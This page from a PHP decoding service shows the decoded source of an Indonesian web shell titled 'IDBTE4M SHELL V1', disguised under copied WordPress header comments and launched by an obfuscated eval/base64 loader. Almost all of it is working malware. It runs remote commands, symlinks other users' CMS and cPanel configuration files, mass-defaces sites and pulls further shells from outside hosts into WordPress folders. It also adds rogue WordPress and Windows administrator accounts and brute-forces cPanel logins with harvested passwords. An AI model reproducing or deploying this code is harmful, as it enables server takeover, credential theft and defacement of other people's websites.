Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Prints signup_header via wp_head * * @since MU (3.0.0) Fix for page t..

Decoded Output download

<?php 
/** 
 * Prints signup_header via wp_head 
 * 
 * @since MU (3.0.0) 
 Fix for page title 
  
 * Bootstrap file for setting the ABSPATH constant 
 * and loading the wp-config.php file. The wp-config.php 
 * file will then load the wp-settings.php file, which 
 * will then set up the WordPress environment. 
 * 
 * If the wp-config.php file is not found then an error 
 * will be displayed asking the visitor to set up the 
 * wp-config.php file. 
 * 
 * Will also search for wp-config.php in WordPress' parent 
 * directory to allow the WordPress directory to remain 
 * untouched. 
 * 
 * @package WordPress 
  * WordPress User Page 
 * 
 * Handles authentication, registering, resetting passwords, forgot password, 
 * and other user handling. 
 * 
 * @package WordPress 
  * Handle Trackbacks and Pingbacks Sent to WordPress 
 * 
 * @since 0.71 
 * 
 * @package WordPress 
 * @subpackage Trackbacks 
  * XML-RPC protocol support for WordPress 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Whether this is an XML-RPC Request 
 * 
 * @var bool 
  * Used to set up and fix common variables and include 
 * the WordPress procedural and class library. 
 * 
 * Allows for some configuration in wp-config.php (see default-constants.php) 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Stores the location of the WordPress directory of functions, classes, and core content. 
 * 
 * @since 1.0.0 
 * Outputs the OPML XML format for getting the links defined in the link 
 * administration. This can be used to export links from one blog over to 
 * another. Links aren't exported by the WordPress export, so this file handles 
 * that. 
 * 
 * This file is not added by default to WordPress theme pages when outputting 
 * feed links. It will have to be added manually for browsers and users to pick 
 * up that this file exists. 
 * 
 * @package WordPress 
 */ 
 /** 
 * Whether this is an XML-RPC Request 
 * 
 * @var bool 
  * Used to set up and fix common variables and include 
 * the WordPress procedural and class library. 
 * 
 * Allows for some configuration in wp-config.php (see default-constants.php) 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Stores the location of the WordPress directory of functions, classes, and core content. 
 * 
 * @since 1.0.0 
 * Outputs the OPML XML format for getting the links defined in the link 
 * administration. This can be used to export links from one blog over to 
 * another. Links aren't exported by the WordPress export, so this file handles 
 * that. 
 * 
 * This file is not added by default to WordPress theme pages when outputting 
 * feed links. It will have to be added manually for browsers and users to pick 
 * up that this file exists. 
 * 
 * @package WordPress 
 */ 
@clearstatcache(); @set_time_limit(0); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors', 0); $settings="cr"."ea"."te"."_fu"."nction";$x=$settings("\$c","e"."va"."l"."('?>'.ba"."se6"."4_d"."ecode(\$c));");$x("<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
$asui = getcwd() . "/";
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$ini = "fopen";
$fw = "fwrite";
$ada = "function_exists";
$crot = "shell_exec";
if (isset($_POST['cmd'])) {
    $mulai = $ini('php.ini', 'w');
    $buat = " safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
register_globals = ON
exec = ON
shell_exec = ON";
    $fw($mulai, $buat);
    if ($ada('shell_exec')) {
        $lihat = $_POST['cmd'];
        $hasil = $crot("$lihat");
        echo "<pre>$hasil</pre>";
    }
    
}

if($_GET['do'] == 'config') {
@ini_set('max_execution_time',0); 
@ini_set('display_errors', 0); 
@ini_set('file_uploads',1);
echo '<form method="POST"><textarea cols="30" name="passwd"  rows="10">'; 
$uSr=file("/etc/passwd"); 
foreach($uSr as $usrr) { 
$str=explode(":",$usrr); echo $str[0]."\n"; } 
echo'</textarea><br><input type="hidden" class="input" name="folfig" value="taek" size=40 />
<select class="inp"  title="Select Your Type File"  name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
<input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>';}
if ($_POST['conf']) {
$folfig = $_POST['folfig']; $type = $_POST['type'];
@mkdir($folfig, 0755); 
@chdir($folfig);
$htaccess="
Options Indexes FollowSymLinks
DirectoryIndex .my.cnf
AddType txt .php
AddType txt .my.cnf
AddType txt .accesshash
AddHandler txt .php
AddHandler txt .cnf
AddHandler txt .accesshash
";
file_put_contents(".htaccess",$htaccess,FILE_APPEND);
$passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
foreach($passwd as $pwd){ $user=trim($pwd);
@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
@symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
@symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
@symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
@symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
@symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
@symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
@symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
@symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
@symlink('/home/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-7.txt');
@symlink('/home/'.$user.'/public_html/connect.php',$user.'-8.txt');
@symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
@symlink('/home/'.$user.'/public_html/include/config.php',$user.'-12.txt');
@symlink('/home/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
@symlink('/home/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
@symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
@symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
@symlink('/home/'.$user.'/public_html/slconfig.php',$user.'-sitelok.txt');
@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-elislab.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangentot.txt');
@symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'-lokmed.txt');
@symlink('/home/'.$user.'/public_html/po-library/po-config.php',$user.'-popojembut.txt');
@symlink('/home/'.$user.'/public_html/lokomedia/config/koneksi.php',$user.'-lokmed.txt');
echo '<center>Selesai mas/mba bro untuk melihat hasilnya klik -> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';

}
}
if($_GET['do'] == 'mass_deface') {
	function sabun_massal($dir,$namafile,$isi_script) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "[<font color=lime>DONE</font>] $lokasi<br>";
							file_put_contents($lokasi, $isi_script);
							$idx = sabun_massal($dirc,$namafile,$isi_script);
						}
					}
				}
			}
		}
	}
	function sabun_biasa($dir,$namafile,$isi_script) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
							file_put_contents($lokasi, $isi_script);
						}
					}
				}
			}
		}
	}
	if($_POST['start']) {
		if($_POST['tipe_sabun'] == 'mahal') {
			echo "<div style='margin: 5px auto; padding: 5px'>";
			sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
			echo "</div>";
		} elseif($_POST['tipe_sabun'] == 'murah') {
			echo "<div style='margin: 5px auto; padding: 5px'>";
			sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
			echo "</div>";
		}
	} else {
	echo "<center>";
	echo "<form method='post'>
	<font style='text-decoration: underline;'>Tipe Sabun:</font><br>
	<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
	<font style='text-decoration: underline;'>Folder:</font><br>
	<input type='text' name='d_dir' value='$asui' style='width: 450px;' height='10'><br>
	<font style='text-decoration: underline;'>Filename:</font><br>
	<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
	<font style='text-decoration: underline;'>Index File:</font><br>
	<textarea name='script' style='width: 450px; height: 200px;'>Hacked by IDBTE4M</textarea><br>
	<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
	</form></center>";
	}
}
if($_GET['do'] == 'jumping') {
	$i = 0;
	echo "<div class='margin: 5px auto;'>";
	if(preg_match("/hsphere/", $dir)) {
		$urls = explode("\r\n", $_POST['url']);
		if(isset($_POST['jump'])) {
			echo "<pre>";
			foreach($urls as $url) {
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)) {
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true) {
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)) {
							$i++;
							$jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a><br>";
							if(is_writable($url_user)) {
								$jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a><br>";
							}
							echo $jrw."<br>";
						}
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
		} else {
			echo '<center>
				  <form method="post">
				  List Domains: <br>
				  <textarea name="url" style="width: 500px; height: 250px;">';
			$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
			while($getss = fgets($fp)) {
				echo $getss;
			}
			echo  '</textarea><br>
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
				  </form></center>';
		}
	} elseif(preg_match("/vhosts/", $dir)) {
		$urls = explode("\r\n", $_POST['url']);
		if(isset($_POST['jump'])) {
			echo "<pre>";
			foreach($urls as $url) {
				$web_vh = "/var/www/vhosts/$url/httpdocs";
				if(is_dir($web_vh) === true) {
					if(is_readable($web_vh)) {
						$i++;
						$jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a><br>";
						if(is_writable($web_vh)) {
							$jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a><br>";
						}
						echo $jrw."<br>";
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
		} else {
			echo '<center>
				  <form method="post">
				  List Domains: <br>
				  <textarea name="url" style="width: 500px; height: 250px;">';
				  bing("ip:$ip");
			echo  '</textarea><br>
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
				  </form></center>';
		}
	} else {
		echo "<pre>";
		$etc = fopen("/etc/passwd", "r");
		while($passwd = fgets($etc)) {
			if($passwd == '' || !$etc) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
				foreach($user_jumping[1] as $user_idx_jump) {
					$user_jumping_dir = "/home/$user_idx_jump/public_html";
					if(is_readable($user_jumping_dir)){
						$i++;
						$jrw = "[<font color=lime>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
						if(is_writable($user_jumping_dir)) {
							$jrw = "[<font color=lime>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
						}
						echo $jrw;
						if(function_exists('posix_getpwuid')) {
							$domain_jump = file_get_contents("/etc/named.conf");	
							if($domain_jump == '') {
								echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
							} else {
								preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
								foreach($domains_jump[1] as $dj) {
									$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
									$user_jumping_url = $user_jumping_url['name'];
									if($user_jumping_url == $user_idx_jump) {
										echo " => ( <u>$dj</u> )<br>";
										break;
									}
								}
							}
						} else {
							echo "<br>";
						}
					}
				}
			}
		}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
	}
	echo "</div>";
}
if($_GET['do'] == 'cret') {
function get_contents($url){
  $ch = curl_init("$url");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  $result = curl_exec($ch);
  return $result;
}

$hecindex = get_contents('http://interchemie.com.ua/libs/l.txt');
$indexyol = $_SERVER['DOCUMENT_ROOT'] . "/.well-known/pki-validation/index.php" ; 
if (file_put_contents ($indexyol, $hecindex));

$htaccess = get_contents('http://ndot.us/za'); 
$htaccesss = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/pomo/umpomone.php" ;
if (file_put_contents ($htaccesss, $htaccess));

$wpoptions = get_contents('http://interchemie.com.ua/libs/l.txt'); 
$wpoptionss = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/plugins/hello.php" ;
if (file_put_contents ($wpoptionss, $wpoptions));


$momindex = get_contents('http://interchemie.com.ua/libs/l.txt');
$momindexx = $_SERVER['DOCUMENT_ROOT'] . "/indeeeex.php" ; 
if (file_put_contents($momindexx, $momindex));

$moduler = get_contents('https://raw.githubusercontent.com/indoxploit-coders/tmp-shell/master/tmp-shell.php');
$modulerr = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/themes/modulke.php";
if (file_put_contents($modulerr, $moduler));

/*BURDAN YUKARI RANDOM SCR&#304;PT*/
/*BURDAN A&#350;&#350;A&#286;ISI WORDPRESSS*/
$wordpress = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/themes/";
if (file_exists($wordpress)) {
	
$wpmodul2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css/colors/blue.php" ;
if (file_put_contents($wpmodul2, $moduler));
if(file_exists($wpmodul2)){
    echo "sex 1 </br>"; 

@chmod($_SERVER['DOCUMENT_ROOT'] . "/indeeeex.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/.well-known/pki-validation/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-includes/pomo/umpomone.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-content/plugins/hello.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css/colors/blue.php", 0644);
echo "Hectopat"."<br>";

}
}
	}else{
			
		}
if($_GET['do'] == 'wpm') {
echo '

<center>
<form method="post">
<input type="text" name="confleg" placeholder="Config URL Here">
<br><br>
<input type="submit" name="chxe" value="Submit">
</form><br><br>
';

@error_reporting(0);
@ini_set('html_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@ini_set('file_uploads', 1);
$ra44 = rand(1, 99999);
function randomNumber($length) {
    $result = '';

    for($i = 0; $i < $length; $i++) {
        $result .= mt_rand(0, 9);
    }

    return $result;
}
function httpGet($url)
{
    $ch = curl_init();
    
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0");
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $output = curl_exec($ch);
    
    curl_close($ch);
    return $output;
}


    if ($_POST['chxe']) {
        $get2 = httpGet($_POST['confleg']);
        preg_match_all('#<a href="(.*?)"#', $get2, $config);
        $count = 1;
        foreach ($config[1] as $don) {
        $kontol = "J3mb0tz";
        $ngntd = "./Mawotz-M4w0tz";
        $get = httpGet($_POST['confleg'] . "/" . $don);
            if(preg_match('/table_prefix/', $get)){
            preg_match_all('/DB_HOST["\'], ["\'](.*?)["\']/', $get, $host);

            $don44 = end($host);
            $host = end($don44);
                #echo $host;
            
            preg_match_all('/DB_PASSWORD["\'], ["\'](.*?)["\']/', $get, $pass);

            $done = end($pass);
            $password = end($done);
            #echo $password."<br>";
            
            preg_match_all('/DB_USER["\'], ["\'](.*?)["\']/', $get, $user);
 
            $done1 = end($user);
            $user = end($done1);
                #echo $user;

            preg_match_all('/DB_NAME["\'], ["\'](.*?)["\']/', $get, $name);

            $done2 = end($name);
            $name = end($done2);
                #echo $name;

            $get23 = preg_replace('/[\s$@_*]+/', '_', $get);
            #echo($get23);
            preg_match_all("/table_prefix_=_['\"](.*?)['\"]/", $get23, $prefix);
            $done3 = end($prefix);
            $prefix = end($done3);
            #echo $prefix;
            $connect = mysqli_connect($host, $user, $password, $name);
            if ($connect) {
                $query1 = mysqli_query($connect, "select * from " . $prefix . "options where option_name='siteurl'");
                
                while ($siteurl = mysqli_fetch_array($query1)) {
                    $site_url = $siteurl['option_value'];
                }
                $query2 = mysqli_query($connect, "INSERT INTO " . $prefix . "users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('" . $ra44 . "', '".$kontol."', '".md5($ngntd)."', 'admins', 'yorangonombot@gmail.com', 'http://www.test.com/', '2011-06-07 00:00:00', '', '0', 'admins')");
                
                $query3 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '" . $ra44 . "', '" . $prefix . "capabilities', '" . 'a:1:{s:13:"administrator";s:1:"1";}' . "')");
                
                $query4 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '" . $ra44 . "', '" . $prefix . "user_level', '10')");
                
                
                if ($query2) {
                    echo "<span class=f><b>NO<b> " . $count . "  :<a href='$site_url/wp-login.php#".$kontol."@".$ngntd."' target='_blank'>$site_url/wp-login.php</a>|".$kontol."|".$ngntd."<br></span>";
                }else{
                    $anjgtol = $_POST['conflegs'] . "/" . $don;
                    #print_r($don);
                    echo "<span class=f><b>NO<b> " . $count . "  :<a href='$anjgtol' target='_blank'>$don --> ERROR MAKE USER<br></span>";
                }
                $count = $count + 1;
            }else{
                    $anjgtol = $_POST['conflegs'] . "/" . $don;
                    #print_r($don);
                    echo "<span class=f><b>NO<b> " . $count . "  :<a href='$anjgtol' target='_blank'>$don --> ERROR SQL<br></span>";
                }
            }
	}
}
	}else{
			
		}
if($_GET['do'] == 'tolls') {
	if($_POST['crack']) {
		$usercp = explode("\r\n", $_POST['user_cp']);
		$passcp = explode("\r\n", $_POST['pass_cp']);
		$i = 0;
		foreach($usercp as $ucp) {
			foreach($passcp as $pcp) {
				if(@mysqli_connect('localhost', $ucp, $pcp)) {
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
					} else {
						$_SESSION[$ucp] = "1";
						$_SESSION[$pcp] = "1";
						if($ucp == '' || $pcp == '') {
							
						} else {
							$i++;
							if(function_exists('posix_getpwuid')) {
								$domain_cp = file_get_contents("/etc/named.conf");	
								if($domain_cp == '') {
									$dom =  "<font color=red>gabisa ambil nama domain nya</font>";
								} else {
									preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
									foreach($domains_cp[1] as $dj) {
										$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
										$user_cp_url = $user_cp_url['name'];
										if($user_cp_url == $ucp) {
											$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
											break;
										}
									}
								}
							} else {
								$dom = "<font color=red>function is Disable by system</font>";
							}
							echo "USA | CPANEL | FRESH AND VALID 100% | http://$dom:2082 | $ucp | $pcp | 6.00<br>";
						}
					}
				}
			}
		}
		if($i == 0) {
		} else {
			echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
		}
	} else {
		echo "<center>
		<form method='post'>
		USER: <br>
		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
		$_usercp = fopen("/etc/passwd","r");
		while($getu = fgets($_usercp)) {
			if($getu == '' || !$_usercp) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all("/(.*?):x:/", $getu, $u);
				foreach($u[1] as $user_cp) {
						if(is_dir("/home/$user_cp/public_html")) {
							echo "$user_cp\n";
					}
				}
			}
		}
		echo "</textarea><br>
		PASS: <br>
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
		function cp_pass($asui) {
			$pass = "";
			$dira = scandir($asui);
			foreach($dira as $dirb) {
				if(!is_file("$dir/$dirb")) continue;
				$ambil = file_get_contents("$dir/$dirb");
				if(preg_match("/WordPress/", $ambil)) {
					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
					$pass .= ambilkata($ambil,"password = '","'")."\n";
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
					$pass .= ambilkata($ambil,'password = "','"')."\n";
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
				} elseif(preg_match("/^[client]$/", $ambil)) {
					preg_match("/password=(.*?)/", $ambil, $pass1);
					if(preg_match('/"/', $pass1[1])) {
						$pass1[1] = str_replace('"', "", $pass1[1]);
						$pass .= $pass1[1]."\n";
					} else {
						$pass .= $pass1[1]."\n";
					}
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
					$pass .= ambilkata($ambil,"db_password = '","'")."\n";
				}
			}
			echo $pass;
		}
		$cp_pass = cp_pass($asui);
		echo $cp_pass;
		echo "</textarea><br>
		<input type='submit' name='crack' style='width: 450px;' value='Crack'>
		</form>
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
	}
}
if($_GET['do'] == 'RDP') {
echo '<p>-| Create RDP  |-</p>
<form action="" method="post">User :<input type="text" name="username" required> Pass :<input type="text" name="password" required> <input type="hidden" name="kshell" value="1"><input type="submit" name="submit" value=">>">
</form>
</div>

<center>
<div id="content-center">
<p>-{ Option }-</p>
<form action="" method="post"><input type="text" name="rusername" placeholder="Masukan Username"> <select name="aksi">
						<option value="1">Tampilkan Username</option>
						<option value="2">Hapus Username</option>
						<option value="3">Ubah Password</option>
				</select>
<input type="hidden" name="kshell" value="2">
<input type="submit" name="submit" value=">>"></form>
</div>';
}
if($_POST['submit']){
echo "<p>---------------{ INFO }---------------</p>";	
if($_POST['kshell']=="1"){
	$r_user = $_POST['username'];
	$r_pass = $_POST['password'];
	$cmd_cek_user   = shell_exec("net user"); 
	if(preg_match("/$r_user/", $cmd_cek_user)){
		echo $gaya_root.$r_user." sudah ada".$o;
	}else {
	$cmd_add_user   = shell_exec("net user ".$r_user." ".$r_pass." /add");
    $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
    $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
    $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
        
    	if($cmd_add_user){
    		echo $gaya_root."<p>[add user]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
    	}else {
    		echo $gaya_root."<p>[add user]-> ".$r_user." <font color='red'>Gagal</font><p>".$o;
    	}
    	if($cmd_add_groups1){
              echo $gaya_root."<p>[add localgroup Administrators]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
    	}else
    	if($cmd_add_groups2){
              echo $gaya_root."<p>[add localgroup Administrator]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
    	}else
    	if($cmd_add_groups3){
              echo $gaya_root."<p>[add localgroup Administrateur]-> ".$r_user." <font color='greenyellow'>Berhasil</font><p>".$o;
    	}else {
    		  echo $gaya_root."<p>[add localgroup]-> ".$r_user." <font color='red'>Gagal - Contact Shor7sec</font><p>".$o;
    	}
			  echo $gaya_root."<p>[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil</font><p>".$o;

	}



}else if($_POST['kshell']=="2"){

if($_POST['aksi']=="1"){
 echo "<pre>".shell_exec("net user");
}
else if($_POST['aksi']=="2"){
$username = $_POST['rusername'];
$cmd_cek_user   = shell_exec("net user");
	if (!empty($username)){
		if(preg_match("/$username/", $cmd_cek_user)){
		$cmd_add_user   = shell_exec("net user ".$username." /DELETE");
		if($cmd_add_user){ 
			echo $gaya_root."<p>[remove user]-> ".$username." <font color='greenyellow'>Berhasil</font><p>".$o;
		}else {
			echo $gaya_root."<p>[remove user]-> ".$username." <font color='red'>gagal</font><p>".$o;
		}
	}else {
		echo $gaya_root."<p>[remove user]-> ".$username." <font color='red'>Tidak ditemukan</font><p>".$o;
	}
	}else {
		echo $gaya_root."<p>[PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font><p>".$o;
	}
}else if($_POST['aksi']=="3"){
$username = $_POST['rusername'];
$password = "jancok";
$cmd_cek_user   = shell_exec("net user");
	if (!empty($username)){
		if(preg_match("/$username/", $cmd_cek_user)){
			$cmd_add_user   = shell_exec("net user ".$username." jancok");
			if($cmd_add_user){
			echo $gaya_root."<p>[change password]-> (".$username."|".$password.") <font color='greenyellow'>Berhasil</font><p>".$o;
		}else {
			echo $gaya_root."<p>[change password]-> (".$username."|".$password.") <font color='red'>GAGAL</font><p>".$o;
		}
	}else
{
	echo $gaya_root."<p>[PESAN]-> <font color='red'>Username Tidak Ditemukan di server</font><p>".$o;
}
}else
{
	echo $gaya_root."<p>[PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font><p>".$o;
}
		
}

}

}
?>

<?php 


		
@ini_set('log_errors',0);
@ini_set('output_buffering',0);
set_time_limit(0);
error_reporting(0);
if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}
echo '<html><head>
<title>-_-</title>
<meta http-equiv="Content-Type" content="jpg/png; charset=utf-8"><div class="gmail_extra"><br>
<link rel="SHORTCUT ICON" href="http://goenk.wapgem.com/idb.png">
<body>
<style type="text/css">
	body {
    background: black;
    color: #00FF00;
    font-family: monospace;
}

.accessGranted {
    position: absolute;
    top: 200px;
    background: #333;
    padding: 20px;
    border: 1px solid #999;
    width: 300px;
    left: 50%;
    margin-left: -150px;
    text-align: center;
}

.accessDenied {
    position: absolute;
    top: 200px;
    color: #F00;
    background: #511;
    padding: 20px;
    border: 1px solid #F00;
    width: 300px;
    left: 50%;
    margin-left: -150px;
    text-align: center;
}
#content-center {
    width: 400px;
    padding: 0px 10px 10px 10px;
    width: 800px; 
    margin: 0 auto;
}
#content-left {
margin: 0 auto;
     text-align: left;
}
#content-right {
margin: 0 auto;
     text-align: right;
}
input,select,textarea{
    border:0;
    border:1px solid #900;
    background:black;
    margin:0;
        color: white;

    padding:2px 4px;
}
input:hover,textarea:hover,select:hover{
    background:black;
        color: blue;

    border:1px solid #f00;
}
                        a{ text-decoration:none; color:red;}
</style>
</head>
<H1><center>-=[+] IDBTE4M SHELL V1 [+]=-</center></H1>
